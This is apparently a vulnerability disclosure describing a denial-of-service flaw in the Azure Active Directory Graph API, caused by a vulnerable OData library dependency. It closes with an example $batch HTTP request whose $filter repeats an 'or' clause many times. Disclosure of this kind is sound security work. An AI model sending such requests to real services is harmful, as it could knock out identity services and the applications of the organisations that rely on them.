Azure Active Directory Graph API
A vulnerability in Azure Active Directory Graph API could allow a remote authenticated attacker to make the service unavailable.
Azure Active Directory is Microsoft’s cloud service that provides identity and access management (IAM) services. It is used by many organizations to authenticate users in Microsoft Azure applications as well as on-premises applications.
Azure Active Directory Graph API Graph API is a REST based interface that provides a programmatic access to this service.
Many applications use this API for the interaction with Azure Active Directory. If the graph API is unavailable for an organization, all the applications that use it will probably be unavailable as well.
The vulnerability is a result of the dependency this service has in Microsoft.Data.OData library which was vulnerable to remote DOS (See CVE-2018-8269).
The exploit can be done by sending an OData Batch request that contain a $filter
parameter with many repetitions of city+eq+'a'+or+city+eq+'a'+or+city+eq+'a'+ ...
.
Here is an example of such a request.
POST https://graph.windows.net/<org id>/$batch?api-version=1.6 HTTP/1.1
Host: graph.windows.net
Authorization: Bearer XXXXX
content-type: multipart/mixed; boundary=RRR
Content-Length: 216
--RRR
Content-type: application/http
Content-Transfer-Encoding: binary
GET https://graph.windows.net/<org id>/users?$filter=city+eq+'a'+or+city+eq+'a'+or.... HTTP/1.1
accept: application/json;odata=minimalmetadata
--RRR--